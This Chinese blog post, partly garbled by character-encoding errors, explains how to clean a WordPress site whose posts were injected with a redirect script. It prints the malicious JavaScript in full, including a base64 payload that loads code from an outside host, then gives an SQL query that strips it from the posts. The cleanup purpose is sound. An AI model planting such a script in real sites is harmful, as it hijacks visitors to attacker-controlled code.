WordPress被SQL注入攻擊了怎么辦？

WordPress被SQL注入攻擊了怎么辦？前幾天一位老哥的網(wǎng)站上的文章末尾，全部被注入了一個(gè)JS代碼，進(jìn)入文章頁時(shí)會(huì)強(qiáng)制跳轉(zhuǎn)，代碼如下） WordPress 注入 攻擊

前幾天一位老哥的網(wǎng)站上的文章末尾，全部被注入了一個(gè)JS代碼，進(jìn)入文章頁時(shí)會(huì)強(qiáng)制跳轉(zhuǎn)，代碼如下

 <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->

WordPress被SQL注入攻擊了怎么辦？

我去數(shù)據(jù)庫中查看，在wp_post表的wp_content字段中，也確實(shí)發(fā)現(xiàn)了這個(gè)代碼，但是，在數(shù)據(jù)庫搜索這個(gè)腳本時(shí)，base64后面的字符串每個(gè)文章都是不一樣的，那就無法使用替代/刪除的辦法了。要是手動(dòng)刪除2000多個(gè)帖子，要?jiǎng)h到猴年馬月去。最終查詢了N多資料后，再國外的一個(gè)論壇上找到了解決辦法。

UPDATE wp_posts SET post_content =
 SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1)
 WHERE LOCATE('<!--codes_iframe-->', post_content) >0;

最終使用這行命令清除了2000+文章的惡意腳本

WordPress被SQL注入攻擊了怎么辦？

• 上一章：WordPress日主題8.9破解版 無加密無后門...
• 下一章：WordPress教程：如何刪除文章的同時(shí)刪除...